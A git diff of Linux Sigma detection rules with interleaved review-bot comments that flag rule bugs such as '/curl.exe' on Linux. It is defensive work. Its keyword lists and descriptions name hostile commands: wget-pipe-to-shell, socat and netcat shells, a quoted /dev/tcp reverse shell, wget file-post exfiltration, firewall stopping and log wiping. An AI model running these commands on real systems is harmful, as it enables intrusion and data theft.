..._creation_lnx_chattr_immutable_removal.yml | 25 ++++++ 34 files changed, 507 insertions(+), 296 deletions(-) create mode 100644 rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_curl_usage.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml create mode 100644 rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml create mode 100644 rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml diff --git a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml index 70a8dec73..c49ea64da 100644 --- a/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml +++ b/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml @@ -5,21 +5,21 @@ author: 'Pawel Mazur' status: experimental date: 2021/11/18 references: - - https://attack.mitre.org/tactics/TA0010/ - - https://linux.die.net/man/1/wget - - https://gtfobins.github.io/gtfobins/wget/ + - https://attack.mitre.org/tactics/TA0010/ + - https://linux.die.net/man/1/wget + - https://gtfobins.github.io/gtfobins/wget/ logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: wget - a1|startswith: '--post-file=' - condition: selection + selection: + type: EXECVE + a0: wget + a1|startswith: '--post-file=' + condition: selection tags: - - attack.exfiltration - - attack.t1048.003 + - attack.exfiltration + - attack.t1048.003 falsepositives: - - Legitimate usage of wget utility to post a file -level: medium \ No newline at end of file + - Legitimate usage of wget utility to post a file +level: medium 
diff --git a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 2515f99b4..7e50f7619 100644 --- a/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -4,33 +4,33 @@ status: test description: 'Detects commandline operations on shell history files' author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2020/10/17 modified: 2021/11/27 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium tags: - - attack.credential_access - - attack.t1552.003 + - attack.credential_access + - attack.t1552.003 diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml index 44a5331c4..e31d748e5 100644 --- a/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/rules/linux/builtin/lnx_shell_susp_commands.yml 
@@ -4,56 +4,56 @@ status: test description: Detects suspicious shell commands used in various exploit codes (see references) author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ date: 2017/08/21 modified: 2021/11/27 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - '*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # 
Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index 611227011..6b542f330 100644 --- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml 
@@ -3,21 +3,20 @@ id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 status: experimental description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md date: 2021/10/16 author: Florian Roth logsource: - product: linux - category: network_connection + product: linux + category: network_connection detection: - selection: - Image|endswith: '/bin/bash' - filter: - DestinationIp: - - '127.0.0.1' - - '0.0.0.0' - condition: selection and not filter + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: critical - diff --git a/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/rules/linux/process_creation/proc_creation_lnx_at_command.yml index 18c74f982..f3fd95576 100644 --- a/rules/linux/process_creation/proc_creation_lnx_at_command.yml +++ b/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -13,8 +13,8 @@ logsource: detection: selection: Image|endswith: - - '/at' - - '/atd' + - '/at' + - '/atd' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml index acbfecabe..21ed3909f 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml 
@@ -4,20 +4,20 @@ status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md date: 2020/10/19 modified: 2021/11/27 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low tags: - - attack.defense_evasion - - attack.t1027 + - attack.defense_evasion + - attack.t1027 diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..73ac17665 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml 
@@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: experimental +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +logsource: + product: linux + category: process_creation +detection: + selection: + - CommandLine|contains: + - "IyEvYmluL2Jhc2" #!/bin/bash" + - "IyEvYmluL2Rhc2" #!/bin/dash" + - "IyEvYmluL3pza" #!/bin/zsh" + - "IyEvYmluL2Zpc2" #!/bin/fish + - "IyEvYmluL3No" # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1140 diff --git a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..42cdad2b6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml 
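Review bot: The five base64 prefixes are only valid when the shebang starts at a byte offset that is a multiple of three in the encoded data; a leading newline, space or BOM before `#!` shifts the alignment and produces entirely different characters, so the rule misses two of the three possible encodings of the same script. Either add the two shifted variants per shebang (computed, not typed by hand) or state the limitation in the rule, e.g. `# Only the unshifted base64 alignment is covered; a leading byte before the shebang encodes differently`. The inline comments are garbled (`#!/bin/bash"` with a stray quote, `# !/bin/sh"` with a space after the hash); writing them uniformly as `# "#!/bin/bash"` would make the mapping obvious. `#!/usr/bin/env bash`-style shebangs are not represented at all; if that is deliberate it deserves a line in the description.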
@@ -4,20 +4,20 @@ status: experimental description: Detects the usage of the unsafe bpftrace option author: Andreas Hunkeler (@Karneades) tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ date: 2022/02/11 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index e9c822de9..5f7b9d5e7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml 
@@ -4,21 +4,24 @@ status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index a3252ac28..115b209a0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -4,7 +4,7 @@ status: stable description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion author: Ömer Günal, oscd.community date: 2020/10/07 -modified: 2022/07/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -15,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index 03cace922..42f0e639b 100644 
--- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -3,7 +3,7 @@ id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.defense_evasion @@ -20,6 +20,10 @@ detection: - 'rm -r /var/log/syslog' - 'rm -f /var/log/syslog' - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' - 'mv /var/log/syslog' - ' >/var/log/syslog' - ' > /var/log/syslog' diff --git a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index 8295856a4..c9c7a3f80 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -3,7 +3,7 @@ id: ec127035-a636-4b9a-8555-0efd4e59f316 status: experimental description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.collection 
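Review bot: Three of the four added `unlink` patterns (`'unlink -r /var/log/syslog'`, `'unlink -f /var/log/syslog'`, `'unlink -rf /var/log/syslog'`) describe invocations that, as far as I know, coreutils `unlink` rejects — it takes exactly one operand and no `-r`/`-f` options — so they can only match a command that failed, whereas the `rm` variants above them mirror real flags. Keeping only `'unlink /var/log/syslog'` avoids dead patterns; if the extra lines are deliberate (a shell alias or non-coreutils build that accepts them), a comment saying so would help the next maintainer. The `modified:` bump in the first hunk of this file is the right convention and is missing from some whitespace-plus-rename hunks elsewhere in this patch (e.g. the bpftrace rule).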
@@ -14,19 +14,13 @@ logsource: product: linux category: process_creation detection: - selection1: + selection: Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' + CommandLine|contains|all: - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - 'clip' - selection4: - CommandLine|contains: '-o' - condition: all of selection* + - '-o' + condition: selection falsepositives: - Legitimate usage of xclip tools. level: low diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..454af266f --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -0,0 +1,21 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: experimental +description: Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index cc4e2eb28..4a66f1c96 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml 
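Review bot: In the new `CommandLine|contains|all` block the `'clip'` term is already satisfied by the process name, since a command line such as `xclip -sel primary -o` contains `xclip`; the selection therefore reduces to `-sel` plus `-o` and does not distinguish the clipboard selection from primary/secondary. The old `selection3` had the same weakness, but the rewrite is the moment to fix it: `- ' clip'` (leading space) anchors the term to an argument and still matches both `-sel clip` and `-selection clipboard`. The hunk otherwise simplifies the rule correctly, and `modified:` is bumped in the first hunk of this file.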
@@ -3,36 +3,36 @@ id: 9069ea3c-b213-4c52-be13-86506a227ab1 status: experimental description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero date: 2021/10/26 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high 
diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..730ba33df --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: experimental +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl.exe' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low +tags: + - attack.command_and_control + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml index 34ac9dccd..85ee9c4e2 100644 
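Review bot: `Image|endswith: '/curl.exe'` in a `product: linux` rule will never match, since the Linux binary has no `.exe` suffix; the rule as written is dead and should read `Image|endswith: '/curl'`, as `proc_creation_lnx_susp_curl_useragent.yml` in this same patch does. The new `proc_creation_lnx_susp_curl_fileupload.yml` further down has the identical `'/curl.exe'` line and needs the same fix. Both look like a copy from the Windows rule that commit 34/96 later touches; a quick grep for `.exe` under `rules/linux/` before merge would catch any others.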
--- a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml +++ b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -1,9 +1,10 @@ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable -description: Detects file deletion using "rm" or "shred" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity author: Ömer Günal, oscd.community date: 2020/10/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md logsource: @@ -14,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index d839d854b..058e10b0e 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -6,7 +6,7 @@ author: Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md date: 2020/10/08 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -16,9 +16,13 @@ detection: selection_2: CommandLine|contains: '''x:0:''' selection_3: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: - '/etc/passwd' + - '/etc/shadow' - '/etc/sudoers' selection_4: Image|endswith: '/id' 
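Review bot: The added `'/etc/shadow'` entry under `selection_3` turns a local-account discovery rule into one that also fires on credential-hash access; reading `/etc/shadow` is a privileged action that maps to OS Credential Dumping (T1003.008) rather than the T1087.001 account-discovery reference this rule cites, and it arguably warrants a higher level than enumerating `/etc/passwd`. Consider a dedicated rule for `/etc/shadow` reads, or at least a comment on the entry and a matching tag, so the alert's severity and mapping stay accurate. The tags block is outside this hunk, so the current tag set is not visible here.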
diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index aa30ec573..ba0b9cad7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -6,7 +6,7 @@ author: Ömer Günal, Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -14,7 +14,10 @@ detection: selection_1: Image|endswith: '/groups' selection_2: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/rules/linux/process_creation/proc_creation_lnx_nohup.yml index 1b8abaea7..1c902a284 100644 --- a/rules/linux/process_creation/proc_creation_lnx_nohup.yml +++ b/rules/linux/process_creation/proc_creation_lnx_nohup.yml 
@@ -4,17 +4,17 @@ status: experimental description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://gtfobins.github.io/gtfobins/nohup/ - - https://en.wikipedia.org/wiki/Nohup - - https://www.computerhope.com/unix/unohup.htm + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm date: 2022/06/06 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/nohup' - condition: selection + selection: + Image|endswith: '/nohup' + condition: selection falsepositives: - - Administrators or installed processes that leverage nohup + - Administrators or installed processes that leverage nohup level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml index 7b7fbcd02..b56b56825 100644 --- a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml +++ b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -26,4 +26,4 @@ detection: condition: selection_image and 1 of selection_cli* falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml index 76ac81188..1fef2d0a7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml 
@@ -1,18 +1,21 @@ title: Security Software Discovery id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test -description: Detects usage of system utilities (only grep for now) to discover security software discovery +description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery author: Daniil Yugoslavskiy, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md date: 2020/10/19 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: selection: - Image|endswith: '/grep' + Image|endswith: + # You can add more grep variations such as fgrep, rgrep...etc + - '/grep' + - '/egrep' CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'td-agent' # fluentd log shipper diff --git a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml index b800cd73a..e48f83c9b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml 
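Review bot: The rewritten description still reads `to discover security software discovery`, which is redundant; suggest `description: Detects usage of system utilities (only grep and egrep for now) to discover security software`. The comment `# You can add more grep variations such as fgrep, rgrep...etc` sits between `Image|endswith:` and its first item; placing it above the key keeps the list contiguous. The explicit `'/egrep'` entry is indeed needed, since `endswith: '/grep'` does not cover it.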
